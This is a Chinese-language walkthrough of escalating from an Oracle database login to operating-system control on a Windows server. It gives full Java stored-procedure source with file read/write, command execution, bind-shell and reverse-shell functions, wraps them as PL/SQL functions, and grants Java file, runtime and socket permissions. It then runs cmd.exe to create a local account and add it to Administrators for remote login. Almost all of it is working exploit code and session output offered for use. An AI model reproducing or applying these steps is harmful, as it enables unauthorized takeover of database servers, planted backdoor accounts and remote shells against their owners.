1.利用已知的Oracle用户名连上数据库,并创建java提权函数
- C:/WINDOWS/system32>sqlplus /nolog
- SQL*Plus: Release 9.2.0.1.0 - Production on 星期日 8月 31 14:01:43 2008
- Copyright (c) 1982, 2002, Oracle Corporation. All rights reserved.
- SQL> conn ysreal/ysreal@(description=(address_list=(address=(protocol=tcp)(host=
- 10.100.0.239)(port=1521)))(connect_data=(SERVICE_NAME=WORK)));
- 已连接。
- SQL>
- SQL> create or replace and compile java source named paeq as
- 2 import java.io.*;
- 3 import java.net.*;
- 4 public class PAEQ{
- 5 public static String listFolder(String path){
- 6 File f=null;
- 7 String str="";
- 8 f=new File(path);
- 9 String[] files=f.list();
- 10 if(files!=null)
- 11 for(int i=0;i<files.length;i++){
- 12 str+=files[i]+"/r/n";
- 13 }
- 14 return str;
- 15 }
- 16 public static String saveFile(String filepath,String value){
- 17 FileOutputStream fos=null;
- 18 try {
- 19 fos=new FileOutputStream(filepath);
- 20 fos.write(value.getBytes());
- 21 return "OK";
- 22 } catch (Exception e) {
- 23 return e.getMessage();
- 24 } finally{
- 25 if(fos!=null){
- 26 try {fos.close();} catch (Exception e) {}
- 27 }
- 28 }
- 29 }
- 30 public static String readFile(String pathfile,String code){
- 31 BufferedReader br=null;
- 32 String value="";
- 33 try {
- 34 br=new BufferedReader(new InputStreamReader(new FileInputStream(pathfile
- ),code));
- 35 String s=null;
- 36 while((s=br.readLine())!=null){
- 37 value+=s;
- 38 }
- 39 return value;
- 40 } catch (Exception e) {
- 41 return e.getMessage();
- 42 } finally{
- 43 if(br!=null){try {br.close();} catch (IOException e) {}}
- 44 }
- 45 }
- 46 public static String execFile(String filepath,String code){
- 47 int i=0;
- 48 Runtime rt=Runtime.getRuntime();
- 49 String output="";
- 50 InputStreamReader isr = null;
- 51 char[] bufferC=new char[1024];
- 52 try{
- 53 Process ps=rt.exec(filepath);
- 54 isr=new InputStreamReader(ps.getInputStream(),code);
- 55 while((i=isr.read(bufferC,0,bufferC.length))!=-1){
- 56 output+=new String(bufferC,0,i);
- 57 }
- 58 return output;
- 59 }catch(Exception e){
- 60 return e.getMessage();
- 61 }finally{
- 62 if(isr!=null)try {isr.close();} catch (IOException e) {}
- 63 }
- 64 }
- 65 public static String bindShell(int port){
- 66 ServerSocket ss=null;
- 67 Socket s=null;
- 68 try {
- 69 ss = new ServerSocket(port);
- 70 s=ss.accept();
- 71 new optShell(ss,s).start();
- 72
- 73 return "OK";
- 74 } catch (Exception e) {
- 75 return e.getMessage();
- 76 }
- 77 }
- 78 public static String reverseShell(String host,int port){
- 79 Socket s=null;
- 80 try{
- 81 s=new Socket(host,port);
- 82 new optShell(null,s).start();
- 83 return "OK";
- 84 }catch(Exception e){
- 85 return e.getMessage();
- 86 }
- 87 }
- 88 public static class optShell extends Thread{
- 89 OutputStream os=null;
- 90 InputStream is=null;
- 91 ServerSocket ss;
- 92 Socket s;
- 93 public optShell(ServerSocket ss,Socket s){
- 94 this.ss=ss;
- 95 this.s=s;
- 96 try{
- 97 this.is=s.getInputStream();
- 98 this.os=s.getOutputStream();
- 99 }catch(Exception e){
- 100 if(os!=null)try {os.close();} catch(Exception ex) {}
- 101 if(is!=null)try {is.close();} catch(Exception ex) {}
- 102 if(s!=null)try {s.close();} catch(Exception ex) {}
- 103 if(ss!=null)try {ss.close();} catch(Exception ex) {}
- 104 }
- 105 }
- 106 public void run(){
- 107 BufferedReader br=new BufferedReader(new InputStreamReader(is));
- 108 String line="";
- 109 String cmdhelp="Command:/r/nlist /r/nsave/r/nread/r/nexec/r/nexit/r/n";
- 110 try {
- 111 //os.write(cmdhelp.getBytes());
- 112 line=br.readLine();
- 113 while(!"exit".equals(line)){
- 114 if(line.length()>3){
- 115 StringBuffer sb=new StringBuffer(line.trim());
- 116 String cmd=sb.substring(0, 4);
- 117 if(cmd.equals("list")){
- 118 os.write("input you path:/r/n".getBytes());
- 119 line=br.readLine();
- 120 os.write(listFolder(line).getBytes());
- 121 }else if("save".equals(cmd)){
- 122 os.write("input you filepath:/r/n".getBytes());
- 123 line=br.readLine();
- 124 os.write("input you value:/r/n".getBytes());
- 125 os.write(saveFile(line,br.readLine()).getBytes());
- 126 }else if("read".equals(cmd)){
- 127 os.write("input you filepath:/r/n".getBytes());
- 128 line=br.readLine();
- 129 os.write("input you code examle:GBK/r/n".getBytes());
- 130 os.write(readFile(line,br.readLine()).getBytes());
- 131 }else if("exec".equals(cmd)){
- 132 os.write("input you run filepath:/r/n".getBytes());
- 133 line=br.readLine();
- 134 os.write("input you code examle:GBK/r/n".getBytes());
- 135 os.write(execFile(line,br.readLine()).getBytes());
- 136 }else{
- 137 os.write(cmdhelp.getBytes());
- 138 }
- 139 }else{
- 140 os.write(cmdhelp.getBytes());
- 141 }
- 142 line=br.readLine();
- 143 }
- 144 } catch (Exception e) {
- 145 e.printStackTrace();
- 146 }finally{
- 147 if(os!=null)try {os.close();} catch(Exception e) {}
- 148 if(is!=null)try {is.close();} catch(Exception e) {}
- 149 if(s!=null)try {s.close();} catch(Exception e) {}
- 150 if(ss!=null)try {ss.close();} catch(Exception e) {}
- 151 }
- 152 }
- 153 }
- 154 }
- 155 /
- Java 已创建。
- SQL> create or replace function PAEQ_LISTFOLDER(str varchar2) return varchar2
- 2 as language java name 'PAEQ.listFolder(java.lang.String) return java.lang.S
- tring';
- 3 /
- 函数已创建。
- SQL> create or replace function PAEQ_SAVEFILE(p varchar2,v varchar2) return varc
- har2
- 2 as language java name 'PAEQ.saveFile(java.lang.String,java.lang.String) ret
- urn java.lang.String';
- 3 /
- 函数已创建。
- SQL> create or replace function PAEQ_READFILE(p varchar2,c varchar2) return varc
- har2
- 2 as language java name 'PAEQ.readFile(java.lang.String,java.lang.String) ret
- urn java.lang.String';
- 3 /
- 函数已创建。
- SQL> create or replace function PAEQ_EXECFILE(fp varchar2,c varchar2) return var
- char2
- 2 as language java name 'PAEQ.execFile(java.lang.String,java.lang.String) ret
- urn java.lang.String';
- 3 /
- 函数已创建。
- SQL> create or replace function PAEQ_BINDSHELL(port number) return varchar2
- 2 as language java name 'PAEQ.bindShell(int) return java.lang.String';/
- 3 /
- 警告: 创建的函数带有编译错误。
- SQL> create or replace function PAEQ_BINDSHELL(port number) return varchar2
- 2 as language java name 'PAEQ.bindShell(int) return java.lang.String';
- 3 /
- 函数已创建。
2.授予权限
- SQL> begin
- 2 Dbms_Java.Grant_Permission('YSREAL','java.io.FilePermission','c:/WINDOWS/sy
- stem32/cmd.exe','read,write,execute,delete');
- 3 Dbms_Java.Grant_Permission('YSREAL','java.lang.RuntimePermission','*','writ
- eFileDescriptor');
- 4 Dbms_Java.grant_permission('YSREAL','java.net.SocketPermission','*:*','acce
- pt,connect,listen,resolve');
- 5 end;
- 6 /
- PL/SQL 过程已成功完成。
3.添加操作系统用户
- SQL> select PAEQ_EXECFILE('C:/WINDOWS/system32/cmd.exe /c net user ceshi ceshi /
- add','GBK') from dual;
- PAEQ_EXECFILE('C:/WINDOWS/SYSTEM32/CMD.EXE/CNETUSERCESHICESHI/ADD','GBK')
- --------------------------------------------------------------------------------
- SQL> select PAEQ_EXECFILE('C:/WINDOWS/system32/cmd.exe /c net localgroup Adminis
- trators ceshi /add','GBK') from dual;
- PAEQ_EXECFILE('C:/WINDOWS/SYSTEM32/CMD.EXE/CNETLOCALGROUPADMINISTRATORSCESHI/ADD
- --------------------------------------------------------------------------------
大功告成,如果系统默认开了远程就可以直接拿用户"ceshi"进行远程连接了。